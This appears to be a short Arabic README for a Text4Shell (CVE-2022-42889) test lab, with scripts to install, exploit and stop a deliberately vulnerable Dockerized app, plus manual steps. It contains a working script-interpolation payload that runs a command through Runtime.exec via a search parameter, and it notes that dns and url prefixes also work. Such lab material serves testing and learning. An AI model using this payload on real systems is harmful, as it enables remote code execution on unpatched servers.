
استغلال آلي لـ CVE-2022-42889 (Text4Shell) مع تطبيق Dockerized ضعيف للاختبار وإرشادات الاستغلال اليدوي.
// للاختراق الآلي:
./install.sh2. `./exploit.sh`
./stopapp.sh// للاختراق اليدوي:
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<anything>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
يمكنك أيضًا تجربة البادئات dns أو url.
الحصول على معرف الحاوية
docker container ls
docker exec -it <container_id> bash
foo تم إنشاؤه في دليل /tmp):ls /tmp/
docker container stop <container_id>